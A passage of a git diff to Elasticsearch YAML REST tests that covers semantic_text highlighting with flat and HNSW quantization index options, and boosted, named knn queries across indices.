query_vector_builder: + text_embedding: + model_text: test + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 4.9952416, error: 1e-3 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } +--- +"Apply boost and query name on multiple indices": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text knn queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-dense-vector-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + query_vector_builder: + text_embedding: + model_text: test + model_id: dense-inference-id + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_3" } + - close_to: { hits.hits.0._score: { value: 0.9990483, error: 1e-4 } } + - not_exists: hits.hits.0.matched_queries + - close_to: { hits.hits.1._score: { value: 0.9439374, error: 1e-4 } } + - not_exists: hits.hits.1.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-dense-vector-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + query_vector_builder: + text_embedding: + model_text: test + model_id: dense-inference-id + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_3" } + - close_to: { hits.hits.0._score: { value: 4.9952416, error: 1e-3 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + - close_to: { hits.hits.1._score: { value: 4.719687, error: 1e-3 } } + - match: { hits.hits.1.matched_queries: [ "i-like-naming-my-queries" ] } diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml index 021dfe320d78e..60dea800ca624 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter.yml @@ -35,6 +35,23 @@ setup: } } + - do: + inference.put: + task_type: text_embedding + inference_id: dense-inference-id-compatible-with-bbq + body: > + { + "service": "text_embedding_test_service", + "service_settings": { + "model": "my_model", + "dimensions": 64, + "similarity": "cosine", + "api_key": "abc64" + }, + "task_settings": { + } + } + - do: indices.create: index: test-sparse-index @@ -70,7 +87,7 @@ setup: id: doc_1 body: title: "Elasticsearch" - body: ["ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!"] + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] refresh: true - do: @@ -89,14 +106,14 @@ setup: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: - another_body: {} + another_body: { } - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } - - not_exists: hits.hits.0.highlight.another_body + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - not_exists: hits.hits.0.highlight.another_body --- "Highlighting using a sparse embedding model": @@ -114,10 +131,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - do: search: @@ -133,11 +150,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: @@ -154,10 +171,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - do: search: @@ -196,10 +213,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -215,11 +232,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: @@ -236,10 +253,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -256,17 +273,17 @@ setup: order: "score" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } --- "Default highlighter for fields": - requires: - cluster_features: "semantic_text.highlighter.default" - reason: semantic text field defaults to the semantic highlighter + cluster_features: "semantic_text.highlighter.default" + reason: semantic text field defaults to the semantic highlighter - do: search: @@ -281,11 +298,11 @@ setup: order: "score" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } --- "semantic highlighter ignores non-inference fields": @@ -306,8 +323,8 @@ setup: type: semantic number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - not_exists: hits.hits.0.highlight.title --- @@ -333,7 +350,7 @@ setup: index: test-multi-chunk-index id: doc_1 body: - semantic_text_field: ["some test data", " ", "now with chunks"] + semantic_text_field: [ "some test data", " ", "now with chunks" ] refresh: true - do: @@ -367,25 +384,25 @@ setup: index: test-sparse-index body: query: - match_all: {} + match_all: { } highlight: fields: body: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: body: @@ -432,18 +449,18 @@ setup: index: test-index-sparse body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.semantic_text_field: 2 } - - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } + - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } + - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } - do: indices.create: @@ -473,7 +490,7 @@ setup: index: test-index-dense body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: @@ -485,3 +502,172 @@ setup: - length: { hits.hits.0.highlight.semantic_text_field: 2 } - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } + +--- +"Highlighting with flat quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-flat + body: + settings: + index.mapping.semantic_text.use_legacy_format: false + mappings: + properties: + flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: flat + int4_flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_flat + int8_flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_flat + bbq_flat_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_flat + + + - do: + index: + index: test-dense-index-flat + id: doc_1 + body: + flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true + + - do: + search: + index: test-dense-index-flat + body: + query: + match_all: { } + highlight: + fields: + flat_field: + type: "semantic" + number_of_fragments: 1 + int4_flat_field: + type: "semantic" + number_of_fragments: 1 + int8_flat_field: + type: "semantic" + number_of_fragments: 1 + bbq_flat_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.flat_field: 1 } + - match: { hits.hits.0.highlight.flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_flat_field: 1 } + - match: { hits.hits.0.highlight.int4_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_flat_field: 1 } + - match: { hits.hits.0.highlight.int8_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_flat_field: 1 } + - match: { hits.hits.0.highlight.bbq_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + +--- +"Highlighting with HNSW quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-hnsw + body: + settings: + index.mapping.semantic_text.use_legacy_format: false + mappings: + properties: + hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: hnsw + int4_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_hnsw + int8_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_hnsw + bbq_hnsw_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_hnsw + + + - do: + index: + index: test-dense-index-hnsw + id: doc_1 + body: + hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true + + - do: + search: + index: test-dense-index-hnsw + body: + query: + match_all: { } + highlight: + fields: + hnsw_field: + type: "semantic" + number_of_fragments: 1 + int4_hnsw_field: + type: "semantic" + number_of_fragments: 1 + int8_hnsw_field: + type: "semantic" + number_of_fragments: 1 + bbq_hnsw_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.hnsw_field: 1 } + - match: { hits.hits.0.highlight.hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int4_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int8_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_hnsw_field: 1 } + - match: { hits.hits.0.highlight.bbq_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml index 1e874d60a016c..4675977842973 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml @@ -35,6 +35,23 @@ setup: } } + - do: + inference.put: + task_type: text_embedding + inference_id: dense-inference-id-compatible-with-bbq + body: > + { + "service": "text_embedding_test_service", + "service_settings": { + "model": "my_model", + "dimensions": 64, + "similarity": "cosine", + "api_key": "abc64" + }, + "task_settings": { + } + } + - do: indices.create: index: test-sparse-index @@ -65,12 +82,12 @@ setup: --- "Highlighting empty field": - do: - index: - index: test-dense-index - id: doc_1 - body: - body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] - refresh: true + index: + index: test-dense-index + id: doc_1 + body: + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true - match: { result: created } @@ -79,14 +96,14 @@ setup: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: - another_body: {} + another_body: { } - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } - - not_exists: hits.hits.0.highlight.another_body + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - not_exists: hits.hits.0.highlight.another_body --- "Highlighting using a sparse embedding model": @@ -95,7 +112,7 @@ setup: index: test-sparse-index id: doc_1 body: - body: ["ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!"] + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] refresh: true - match: { result: created } @@ -114,10 +131,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - do: search: @@ -133,11 +150,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: @@ -154,10 +171,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - do: search: @@ -187,7 +204,7 @@ setup: index: test-dense-index id: doc_1 body: - body: ["ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!"] + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] refresh: true - match: { result: created } @@ -206,10 +223,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -225,11 +242,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: @@ -246,10 +263,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -266,11 +283,11 @@ setup: order: "score" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } --- "Highlighting and multi chunks with empty input": @@ -295,7 +312,7 @@ setup: index: test-multi-chunk-index id: doc_1 body: - semantic_text_field: ["some test data", " ", "now with chunks"] + semantic_text_field: [ "some test data", " ", "now with chunks" ] refresh: true - do: @@ -337,18 +354,18 @@ setup: index: test-sparse-index body: query: - match_all: {} + match_all: { } highlight: fields: body: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: index: @@ -363,7 +380,7 @@ setup: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: body: @@ -410,18 +427,18 @@ setup: index: test-index-sparse body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.semantic_text_field: 2 } - - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } + - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } + - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } - do: indices.create: @@ -451,7 +468,7 @@ setup: index: test-index-dense body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: @@ -464,3 +481,173 @@ setup: - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } +--- +"Highlighting with flat quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-flat + body: + settings: + index.mapping.semantic_text.use_legacy_format: true + mappings: + properties: + flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: flat + int4_flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_flat + int8_flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_flat + bbq_flat_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_flat + + + - do: + index: + index: test-dense-index-flat + id: doc_1 + body: + flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true + + - do: + search: + index: test-dense-index-flat + body: + query: + match_all: { } + highlight: + fields: + flat_field: + type: "semantic" + number_of_fragments: 1 + int4_flat_field: + type: "semantic" + number_of_fragments: 1 + int8_flat_field: + type: "semantic" + number_of_fragments: 1 + bbq_flat_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.flat_field: 1 } + - match: { hits.hits.0.highlight.flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_flat_field: 1 } + - match: { hits.hits.0.highlight.int4_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_flat_field: 1 } + - match: { hits.hits.0.highlight.int8_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_flat_field: 1 } + - match: { hits.hits.0.highlight.bbq_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + +--- +"Highlighting with HNSW quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-hnsw + body: + settings: + index.mapping.semantic_text.use_legacy_format: true + mappings: + properties: + hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: hnsw + int4_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_hnsw + int8_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_hnsw + bbq_hnsw_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_hnsw + + + - do: + index: + index: test-dense-index-hnsw + id: doc_1 + body: + hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true + + - do: + search: + index: test-dense-index-hnsw + body: + query: + match_all: { } + highlight: + fields: + hnsw_field: + type: "semantic" + number_of_fragments: 1 + int4_hnsw_field: + type: "semantic" + number_of_fragments: 1 + int8_hnsw_field: + type: "semantic" + number_of_fragments: 1 + bbq_hnsw_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.hnsw_field: 1 } + - match: { hits.hits.0.highlight.hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int4_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int8_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_hnsw_field: 1 } + - match: { hits.hits.0.highlight.bbq_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + + + diff --git a/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 